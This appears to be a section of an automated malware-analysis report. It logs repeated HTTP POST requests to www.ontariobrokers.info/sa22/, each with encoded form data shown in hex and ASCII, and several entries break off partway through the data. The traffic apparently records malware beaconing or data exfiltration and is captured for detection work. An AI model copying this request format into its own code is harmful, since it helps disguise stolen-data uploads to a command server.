Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 4c 67 36 73 4d 57 52 54 64 4f 61 41 53 7e 65 4d 31 66 6d 34 71 52 46 52 6d 6a 34 48 6b 6f 7a 43 68 6b 4a 4a 36 36 58 45 35 47 59 4f 48 38 46 6c 46 64 6c 79 6f 45 55 66 65 7a 72 50 4c 62 75 4f 41 70 4f 71 6a 45 56 41 79 44 61 28 50 36 43 53 33 4e 51 61 44 6c 6a 28 4c 54 42 48 64 37 68 30 31 70 6c 74 59 4f 59 42 45 66 79 36 4c 72 38 48 4c 36 53 69 43 45 4e 30 32 52 70 52 35 6b 2d 72 48 64 56 73 6e 6b 75 6d 51 32 6c 4a 37 35 41 6b 54 43 74 6e 65 63 45 6f 4b 28 37 39 35 34 52 73 54 4a 52 31 4a 64 51 4b 75 50 43 45 5f 61 64 6b 73 72 32 39 55 69 39 66 78 52 39 51 34 36 56 76 45 42 35 76 5a 57 45 33 6c 47 51 61 58 6f 35 58 51 62 70 5a 4b 64 54 44 68 50 67 38 43 6a 4f 50 4c 4e 75 65 55 4f 55 56 44 6f 51 56 4a 6d 31 6f 54 62 63 54 4b 6d 33 79 69 4f 49 4d 63 79 2d 64 37 39 4e 69 35 56 48 62 41 42 72 64 6e 4d 4b 38 36 44 46 71 54 49 50 31 59 4f 67 68 4c 6b 57 61 57 73 6e 59 4c 46 7a 4a 5f 51 57 69 39 32 74 45 52 37 6b 50 45 7e 58 45 5a 68 69 66 4d 28 73 66 6a 54 6c 79 63 28 7a 31 44 56 75 35 76 7a 38 35 55 66 53 33 66 53 31 5a 4d 53 6d 28 70 56 71 6a 38 43 72 6c 69 66 56 4c 33 62 77 34 77 41 75 35 32 7a 48 34 38 43 34 28 51 66 52 35 7a 70 6f 6d 74 71 67 44 72 36 45 64 69 61 79 32 42 33 62 50 63 66 59 47 50 34 59 6f 56 4c 45 6d 4f 59 45 70 5f 7a 37 34 33 71 4e 66 44 55 65 49 68 61 4b 28 66 76 35 7e 4d 44 31 63 73 43 33 53 42 75 72 77 63 28 74 7e 44 49 77 4d 49 51 56 4f 4c 4e 55 47 58 75 6d 59 56 7a 74 6d 61 28 61 43 4d 69 6f 42 53 73 62 58 4d 38 71 71 41 42 62 35 78 31 49 43 79 64 46 63 47 67 37 61 51 55 38 59 53 70 4d 66 38 66 76 73 34 70 63 30 59 56 75 67 53 41 77 33 63 32 50 52 33 64 55 6c 6e 77 38 74 54 44 38 75 4f 65 63 4f 72 69 6a 50 53 38 58 6e 37 38 7a 6b 35 47 37 35 59 77 6b 7e 4e 63 35 45 4a 6e 43 35 6e 61 51 4d 47 33 4f 41 44 6c 36 4a 66 33 42 61 65 51 52 42 65 63 78 79 73 73 43 30 51 47 6d 28 74 62 38 73 51 65 6c 67 38 73 76 64 58 4c 4f 68 76 39 65 35 58 45 32 67 55 33 61 70 78 77 63 77 4e 37 51 33 36 61 6e 46 6f 64 4b 6c 68 6a 69 46 72 4b 35 5a 64 59 67 46 53 65 64 37 4c 61 62 79 70 49 33 69 4b 50 37 56 64 4e 2d 69 43 61 41 44 4f 33 4c 44 69 62 67 54 70 34 58 37 42 79 42 6d 37 6b 35 7a 4d 4d 2d 33 63 55 31 59 55 6b 4b 75 6d 59 36 7a 52 33 71 31 45 6b 35 77 33 38 48 5a 78 4c 65
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 4c 67 36 73 4d 57 52 54 64 4f 61 41 53 7e 65 4d 31 66 6d 34 71 52 46 52 6d 6a 34 48 6b 6f 7a 43 68 6b 4a 4a 36 36 58 45 35 47 59 4f 48 38 46 6c 46 64 6c 79 6f 45 55 66 65 7a 72 50 4c 62 75 4f 41 70 4f 71 6a 45 56 41 79 44 61 28 50 36 43 53 33 4e 51 61 44 6c 6a 28 4c 54 42 48 64 37 68 30 31 70 6c 74 59 4f 59 42 45 66 79 36 4c 72 38 48 4c 36 53 69 43 45 4e 30 32 52 70 52 35 6b 2d 72 48 64 56 73 6e 6b 75 6d 51 32 6c 4a 37 35 41 6b 54 43 74 6e 65 63 45 6f 4b 28 37 39 35 34 52 73 54 4a 52 31 4a 64 51 4b 75 50 43 45 5f 61 64 6b 73 72 32 39 55 69 39 66 78 52 39 51 34 36 56 76 45 42 35 76 5a 57 45 33 6c 47 51 61 58 6f 35 58 51 62 70 5a 4b 64 54 44 68 50 67 38 43 6a 4f 50 4c 4e 75 65 55 4f 55 56 44 6f 51 56 4a 6d 31 6f 54 62 63 54 4b 6d 33 79 69 4f 49 4d 63 79 2d 64 37 39 4e 69 35 56 48 62 41 42 72 64 6e 4d 4b 38 36 44 46 71 54 49 50 31 59 4f 67 68 4c 6b 57 61 57 73 6e 59 4c 46 7a 4a 5f 51 57 69 39 32 74 45 52 37 6b 50 45 7e 58 45 5a 68 69 66 4d 28 73 66 6a 54 6c 79 63 28 7a 31 44 56 75 35 76 7a 38 35 55 66 53 33 66 53 31 5a 4d 53 6d 28 70 56 71 6a 38 43 72 6c 69 66 56 4c 33 62 77 34 77 41 75 35 32 7a 48 34 38 43 34 28 51 66 52 35 7a 70 6f 6d 74 71 67 44 72 36 45 64 69 61 79 32 42 33 62 50 63 66 59 47 50 34 59 6f 56 4c 45 6d 4f 59 45 70 5f 7a 37 34 33 71 4e 66 44 55 65 49 68 61 4b 28 66 76 35 7e 4d 44 31 63 73 43 33 53 42 75 72 77 63 28 74 7e 44 49 77 4d 49 51 56 4f 4c 4e 55 47 58 75 6d 59 56 7a 74 6d 61 28 61 43 4d 69 6f 42 53 73 62 58 4d 38 71 71 41 42 62 35 78 31 49 43 79 64 46 63 47 67 37 61 51 55 38 59 53 70 4d 66 38 66 76 73 34 70 63 30 59 56 75 67 53 41 77 33 63 32 50 52 33 64 55 6c 6e 77 38 74 54 44 38 75 4f 65 63 4f 72 69 6a 50 53 38 58 6e 37 38 7a 6b 35 47 37 35 59 77 6b 7e 4e 63 35 45 4a 6e 43 35 6e 61 51 4d 47 33 4f 41 44 6c 36 4a 66 33 42 61 65 51 52 42 65 63 78 79 73 73 43 30 51 47 6d 28 74 62 38 73 51 65 6c 67 38 73 76 64 58 4c 4f 68 76 39 65 35 58 45 32 67 55 33 61 70 78 77 63 77 4e 37 51 33 36 61 6e 46 6f 64 4b 6c 68 6a 69 46 72 4b 35 5a 64 59 67 46 53 65 64 37 4c 61 62 79 70 49 33 69 4b 50 37 56 64 4e 2d 69 43 61 41 44 4f 33 4c 44 69 62 67 54 70 34 58 37 42 79 42 6d 37 6b 35 7a 4d 4d 2d 33 63 55 31 59 55 6b 4b 75 6d 59 36 7a 52 33 71 31 45 6b 35 77 33 38 48 5a 78 4c 65
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 Data Ascii: xL3hLB=FOBWv5QE4PihQ3auFr8CASnVsDBdKn7B2qEBy3lsJeMBexHEzBTYW2y82xlYQr5RP3mmczpMNYgn4hqmjTTIg5vuqY3UEHUiuKGFurviDxudcoQWB
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c Data Ascii: xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cL
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 Data Ascii: xL3hLB=FOBWv5QE4PihQ3auFr8CASnVsDBdKn7B2qEBy3lsJeMBexHEzBTYW2y82xlYQr5RP3mmczpMNYgn4hqmjTTIg5vuqY3UEHUiuKGFurviDxudcoQWB
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c Data Ascii: xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cL
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 4c 67 36 73 4d 57 52 54 64 4f 61 41 53 7e 65 4d 31 66 6d 34 71 52 46 52 6d 6a 34 48 6b 6f 7a 43 68 6b 4a 4a 36 36 58 45 35 47 59 4f 48 38 46 6c 46 64 6c 79 6f 45 55 66 65 7a 72 50 4c 62 75 4f 41 70 4f 71 6a 45 56 41 79 44 61 28 50 36 43 53 33 4e 51 61 44 6c 6a 28 4c 54 42 48 64 37 68 30 31 70 6c 74 59 4f 59 42 45 66 79 36 4c 72 38 48 4c 36 53 69 43 45 4e 30 32 52 70 52 35 6b 2d 72 48 64 56 73 6e 6b 75 6d 51 32 6c 4a 37 35 41 6b 54 43 74 6e 65 63 45 6f 4b 28 37 39 35 34 52 73 54 4a 52 31 4a 64 51 4b 75 50 43 45 5f 61 64 6b 73 72 32 39 55 69 39 66 78 52 39 51 34 36 56 76 45 42 35 76 5a 57 45 33 6c 47 51 61 58 6f 35 58 51 62 70 5a 4b 64 54 44 68 50 67 38 43 6a 4f 50 4c 4e 75 65 55 4f 55 56 44 6f 51 56 4a 6d 31 6f 54 62 63 54 4b 6d 33 79 69 4f 49 4d 63 79 2d 64 37 39 4e 69 35 56 48 62 41 42 72 64 6e 4d 4b 38 36 44 46 71 54 49 50 31 59 4f 67 68 4c 6b 57 61 57 73 6e 59 4c 46 7a 4a 5f 51 57 69 39 32 74 45 52 37 6b 50 45 7e 58 45 5a 68 69 66 4d 28 73 66 6a 54 6c 79 63 28 7a 31 44 56 75 35 76 7a 38 35 55 66 53 33 66 53 31 5a 4d 53 6d 28 70 56 71 6a 38 43 72 6c 69 66 56 4c 33 62 77 34 77 41 75 35 32 7a 48 34 38 43 34 28 51 66 52 35 7a 70 6f 6d 74 71 67 44 72 36 45 64 69 61 79 32 42 33 62 50 63 66 59 47 50 34 59 6f 56 4c 45 6d 4f 59 45 70 5f 7a 37 34 33 71 4e 66 44 55 65 49 68 61 4b 28 66 76 35 7e 4d 44 31 63 73 43 33 53 42 75 72 77 63 28 74 7e 44 49 77 4d 49 51 56 4f 4c 4e 55 47 58 75 6d 59 56 7a 74 6d 61 28 61 43 4d 69 6f 42 53 73 62 58 4d 38 71 71 41 42 62 35 78 31 49 43 79 64 46 63 47 67 37 61 51 55 38 59 53 70 4d 66 38 66 76 73 34 70 63 30 59 56 75 67 53 41 77 33 63 32 50 52 33 64 55 6c 6e 77 38 74 54 44 38 75 4f 65 63 4f 72 69 6a 50 53 38 58 6e 37 38 7a 6b 35 47 37 35 59 77 6b 7e 4e 63 35 45 4a 6e 43 35 6e 61 51 4d 47 33 4f 41 44 6c 36 4a 66 33 42 61 65 51 52 42 65 63 78 79 73 73 43 30 51 47 6d 28 74 62 38 73 51 65 6c 67 38 73 76 64 58 4c 4f 68 76 39 65 35 58 45 32 67 55 33 61 70 78 77 63 77 4e 37 51 33 36 61 6e 46 6f 64 4b 6c 68 6a 69 46 72 4b 35 5a 64 59 67 46 53 65 64 37 4c 61 62 79 70 49 33 69 4b 50 37 56 64 4e 2d 69 43 61 41 44 4f 33 4c 44 69 62 67 54 70 34 58 37 42 79 42 6d 37 6b 35 7a 4d 4d 2d 33 63 55 31 59 55 6b 4b 75 6d 59 36 7a 52 33 71 31 45 6b 35 77 33 38 48 5a 78 4c 65
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 4c 67 36 73 4d 57 52 54 64 4f 61 41 53 7e 65 4d 31 66 6d 34 71 52 46 52 6d 6a 34 48 6b 6f 7a 43 68 6b 4a 4a 36 36 58 45 35 47 59 4f 48 38 46 6c 46 64 6c 79 6f 45 55 66 65 7a 72 50 4c 62 75 4f 41 70 4f 71 6a 45 56 41 79 44 61 28 50 36 43 53 33 4e 51 61 44 6c 6a 28 4c 54 42 48 64 37 68 30 31 70 6c 74 59 4f 59 42 45 66 79 36 4c 72 38 48 4c 36 53 69 43 45 4e 30 32 52 70 52 35 6b 2d 72 48 64 56 73 6e 6b 75 6d 51 32 6c 4a 37 35 41 6b 54 43 74 6e 65 63 45 6f 4b 28 37 39 35 34 52 73 54 4a 52 31 4a 64 51 4b 75 50 43 45 5f 61 64 6b 73 72 32 39 55 69 39 66 78 52 39 51 34 36 56 76 45 42 35 76 5a 57 45 33 6c 47 51 61 58 6f 35 58 51 62 70 5a 4b 64 54 44 68 50 67 38 43 6a 4f 50 4c 4e 75 65 55 4f 55 56 44 6f 51 56 4a 6d 31 6f 54 62 63 54 4b 6d 33 79 69 4f 49 4d 63 79 2d 64 37 39 4e 69 35 56 48 62 41 42 72 64 6e 4d 4b 38 36 44 46 71 54 49 50 31 59 4f 67 68 4c 6b 57 61 57 73 6e 59 4c 46 7a 4a 5f 51 57 69 39 32 74 45 52 37 6b 50 45 7e 58 45 5a 68 69 66 4d 28 73 66 6a 54 6c 79 63 28 7a 31 44 56 75 35 76 7a 38 35 55 66 53 33 66 53 31 5a 4d 53 6d 28 70 56 71 6a 38 43 72 6c 69 66 56 4c 33 62 77 34 77 41 75 35 32 7a 48 34 38 43 34 28 51 66 52 35 7a 70 6f 6d 74 71 67 44 72 36 45 64 69 61 79 32 42 33 62 50 63 66 59 47 50 34 59 6f 56 4c 45 6d 4f 59 45 70 5f 7a 37 34 33 71 4e 66 44 55 65 49 68 61 4b 28 66 76 35 7e 4d 44 31 63 73 43 33 53 42 75 72 77 63 28 74 